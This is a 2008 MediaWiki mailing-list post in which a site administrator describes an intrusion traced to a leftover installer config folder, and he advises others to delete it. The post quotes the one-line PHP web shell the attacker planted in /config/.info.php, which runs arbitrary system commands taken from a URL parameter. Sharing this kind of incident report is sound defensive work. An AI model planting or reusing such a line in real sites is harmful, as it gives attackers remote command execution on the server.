[Mediawiki-l] Index.php page under hackers attack?
Itay Ophir
itay at worldwideworkshop.org
Fri Mar 14 16:40:05 UTC 2008
We managed to find and hopefully resolve this security hole.
It was not the index.php.
It was the /config/.info.php In that file there is the following line:
<?php system($_GET["id"]) ?>
We didn’t delete the config folder so someone was able to use that script to
get it.
The Mediawiki installation process does tell you to delete the config
folder. Maybe it should be in red J
I hope this will help everyone remember to remove the config folder after
installing the wiki.
Thanks,
Itay
More information about the MediaWiki-l
mailing list